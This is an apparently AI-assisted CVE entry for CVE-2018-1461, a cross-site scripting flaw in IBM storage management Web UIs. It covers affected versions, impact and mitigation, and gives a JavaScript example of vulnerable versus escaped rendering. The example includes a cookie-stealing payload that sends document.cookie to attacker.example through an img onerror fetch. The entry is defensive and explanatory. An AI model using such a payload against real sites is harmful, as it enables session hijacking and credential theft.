CVE-2018-1461
Description
IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products (6.1, 6.2, 6.3, 6.4, 7.1, 7.2, 7.3, 7.4, 7.5, 7.6, 7.6.1, 7.7, 7.7.1, 7.8, 7.8.1, 8.1, and 8.1.1) are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 140362.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A cross-site scripting vulnerability in the Web UI of multiple IBM storage products allows a user who can submit input to the Web UI to embed arbitrary JavaScript that runs in another user's trusted session, potentially disclosing that user's credentials.
Vulnerability
CVE-2018-1461 is a cross-site scripting (XSS) vulnerability in the Web UI of IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize, and IBM FlashSystem products running versions 6.1, 6.2, 6.3, 6.4, 7.1, 7.2, 7.3, 7.4, 7.5, 7.6, 7.6.1, 7.7, 7.7.1, 7.8, 7.8.1, 8.1, and 8.1.1 [1][2][3]. Per the description, the flaw lets users embed arbitrary JavaScript code in the Web UI, altering its intended functionality; the public references do not name the affected field or page, nor do they state whether the payload is stored or reflected [1][2][3].
Exploitation
The description says "users" can embed JavaScript, so the attacker is presumed to be someone who can submit input to the Web UI (for example a low-privileged management account); the references do not state that any affected input is reachable without authentication, so unauthenticated exploitation should not be assumed. The injected script does nothing until a victim, typically an administrator, views the affected page in a trusted session; at that point the browser executes it with the victim's privileges in the management UI [1][2][3].
Impact
If a victim user views the maliciously crafted page, the injected JavaScript executes in the context of their session. The script can read whatever the browser exposes to page script in that origin (session tokens or cookies that are not HttpOnly, values the victim types into forms) and can issue requests to the management API as the victim, so the practical impact is credential disclosure and any management action the victim is permitted to perform, compromising the integrity and confidentiality of the storage management system [1][2][3].
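The mechanism described above, as an added example that is not IBM code and is not taken from the advisory: a management Web UI row template that concatenates a stored, user-controlled value into HTML, beside the hardened form that HTML-encodes the value for its context. The "volume name" field, the page template and the attacker host are assumptions for illustration; the bulletins do not say which field was affected.

```javascript
// Added example (not IBM code). Shows why an unescaped user-controlled field
// in a management Web UI becomes XSS, and the output-encoding fix.
// The "volume" record, its "name" field and the attacker host are assumed
// for illustration only.

// Minimal HTML entity encoding for text placed in an element body or inside a
// double-quoted attribute value.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable pattern: the saved value is concatenated straight into markup
// that every administrator who opens the page will have rendered in their
// trusted session.
function renderVolumeRowVulnerable(volume) {
  return `<tr><td>${volume.id}</td><td>${volume.name}</td></tr>`;
}

// Hardened pattern: every untrusted value is encoded for its HTML context
// before it reaches the page.
function renderVolumeRowSafe(volume) {
  return `<tr><td>${escapeHtml(volume.id)}</td><td>${escapeHtml(volume.name)}</td></tr>`;
}

// Check used here to show the difference: after removing the template's own
// <tr>/<td> tags, does any raw tag remain that came from the data?
function hasInjectedTag(html) {
  const withoutTemplate = html.replace(/<\/?(tr|td)>/g, "");
  return /<[a-z/!]/i.test(withoutTemplate);
}

// Constructed payload of the kind a user with Web UI access could save in a
// free-text field; when rendered unescaped it sends the viewer's cookies to
// an attacker-controlled host (hypothetical hostname).
const hostilePayload =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';
const volume = { id: 7, name: hostilePayload };

function demo() {
  const vulnerable = renderVolumeRowVulnerable(volume);
  const safe = renderVolumeRowSafe(volume);
  return {
    vulnerableIsActive: hasInjectedTag(vulnerable), // true: <img onerror=...> survives
    safeIsActive: hasInjectedTag(safe),             // false: rendered as inert text
    safe,
  };
}

console.log(demo());
```

Output encoding at the point of rendering is the fix the vendor would have applied; marking the session cookie HttpOnly and serving a Content-Security-Policy that disallows inline script limit what a surviving payload can do, but neither substitutes for the encoding.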
Mitigation
IBM has released firmware updates to address this vulnerability. The advisory recommends upgrading to a fixed version; the exact fixed version numbers and release dates are provided in the IBM security bulletins [1][2][3]. Workarounds are not detailed in the available references; until the upgrade is applied, the usual hardening for a management interface (exposing the Web UI only on a trusted management network and limiting who holds accounts on it) reduces who can plant a payload and who would view it, but this is general practice rather than guidance from the bulletins. There is no indication that this CVE is listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
- Security Bulletin: Multiple vulnerabilities in IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products
- Security Bulletin: Multiple vulnerabilities affect the IBM FlashSystem model V840
- Security Bulletin: Multiple vulnerabilities affect the IBM FlashSystem models 840 and 900
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (12)
- Range: >=6.1, <=8.1.1 (+1 more)
- (no CPE) Range: >=6.1, <=8.1.1
- (no CPE) Range: 6.1
- Range: >=6.1, <=8.1.1
- Range: 7.5
- IBM / Spectrum Virtualize for Public Cloud (v5) Range: 7.5
- IBM / Spectrum Virtualize Software (v5) Range: 7.5
- Range: 6.4
- Range: 7.1
- Range: 7.1
- Range: 6.1
Patches (0)
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References (5)
- www.ibm.com/support/docview.wss (mitre, x_refsource_CONFIRM)
- www.ibm.com/support/docview.wss (mitre, x_refsource_CONFIRM)
- www.ibm.com/support/docview.wss (mitre, x_refsource_CONFIRM)
- www.securityfocus.com/bid/104349 (mitre, vdb-entry, x_refsource_BID)
- exchange.xforce.ibmcloud.com/vulnerabilities/140362 (mitre, vdb-entry, x_refsource_XF)
News mentions (0)
No linked articles in our index yet.